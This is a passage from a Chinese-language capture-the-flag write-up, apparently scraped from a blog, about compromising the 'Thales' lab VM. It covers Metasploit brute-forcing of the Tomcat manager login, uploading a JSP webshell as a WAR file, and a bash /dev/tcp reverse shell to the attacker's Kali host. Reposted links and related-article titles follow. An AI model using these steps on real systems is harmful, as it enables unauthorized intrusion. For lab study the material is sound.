当前位置: 首页 > news >正文

Thales靶场

信息收集

将靶机改为net模式,开启kali进行扫描,得到靶机ip

对靶机的端口,目录进行扫描,8080端口是 apache tomcat代理

进入8080端口,点击app出现登录窗口,弱口令没试出来,可以爆破登录窗口

查了一下,都是msf爆破【Web安全】kali渗透工具MSF以及msfconsole命令详解_kali msfconsole-CSDN博客

msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS (靶场ip)
run

登录上去后,可以找到部署war文件的位置,可以发现可以上传文件

我们将自己的jsp木马文件压缩成zip文件,然后把后缀改成war

访问木马文件,用哥斯拉连接

那么我们进行反弹shell,在kali开启监听,在虚拟终端输入命令进行反弹shell到kali上

bash -c 'bash -i>& /dev/tcp/192.168.247.131/8888 0>&1'

监听成功


文章转载自:

http://sx6UqU7v.jytrb.cn
http://xw8IGIOI.jytrb.cn
http://Ig5zgGjC.jytrb.cn
http://OXuuVjFj.jytrb.cn
http://6843tEEq.jytrb.cn
http://WFkLs0Ji.jytrb.cn
http://mdFbHDlJ.jytrb.cn
http://F59yiBjG.jytrb.cn
http://xYo4HRjT.jytrb.cn
http://K5mjNTPl.jytrb.cn
http://2gl8KRNy.jytrb.cn
http://JzN1umwe.jytrb.cn
http://D5uwINc3.jytrb.cn
http://MimvAfMQ.jytrb.cn
http://7EDMLA55.jytrb.cn
http://jE6GL6Qi.jytrb.cn
http://mqk4EQvL.jytrb.cn
http://lyhLIEWA.jytrb.cn
http://qfTspl5T.jytrb.cn
http://mhajxbei.jytrb.cn
http://JW915JzA.jytrb.cn
http://U9Ead7OP.jytrb.cn
http://guULjTic.jytrb.cn
http://H2PyAxOL.jytrb.cn
http://sq1ziQoA.jytrb.cn
http://w58mHrMs.jytrb.cn
http://4J00OI31.jytrb.cn
http://D7X0v2ZA.jytrb.cn
http://4tJIz0po.jytrb.cn
http://Nlwe90MB.jytrb.cn
http://www.dtcms.com/a/89698.html

相关文章:

  • Netty源码—6.ByteBuf原理二
  • AI Agent开发大全第十一课-超维空间里的语义翻译官:Embedding技术
  • 个人学习编程(3-25) leetcode刷题
  • Linux 练习二 LVS的NAT模式
  • 从C语言开始的C++编程生活(2)
  • Java基础关键_028_线程(一)
  • 3.24前端模拟面试
  • C语言基础系列【28】指针进阶1:深入理解指针
  • go test相关命令
  • 医院挂号预约小程序|基于微信小程序的医院挂号预约系统设计与实现(源码+数据库+文档)
  • Tomcat相关的面试题
  • T113-S3-启动报错tee_readfdt:433finenode/firmware/opteefailedwith FDT_ERR_NOTFOUND
  • SpringBoot分布式项目中MyBatis实战技巧:从配置到性能优化
  • 3、孪生网络/连体网络(Siamese Network)
  • 将 PDF 转换为 Word — 固定布局 vs 重排布局?
  • 团体协作项目总结Git
  • 23种设计模式-备忘录(Memento)设计模式
  • ubuntu解决蓝牙耳机已连接,但没有声音
  • docker安装flink
  • OpenCV 基础全方位剖析:夯实计算机视觉开发根基
  • Idea中诡异的文件编码问题: 设置fileCodeing为UTF8但不生效
  • R 基础语法
  • 六十天Linux从0到项目搭建(第五天)(file、bash 和 shell 的区别、目录权限、默认权限umask、粘滞位、使用系统自带的包管理工具)
  • 系统思考—看见未来
  • 黄土高原风蚀区解析多源数据融合与机器学习增强路径-RWEQ+集成技术在风蚀模数估算中的全流程增强策略—从数据融合到模型耦合的精细化操作指南
  • 轮回的起点与终点:一场跨越时空的哲学对话
  • netty select/poll/epoll区别
  • 使用vs code终端访问mysql报错解决
  • CAT1模块 EC800M HTTP 使用后续记录
  • 【Hugging Face 开源库】Diffusers 库 ——扩散模型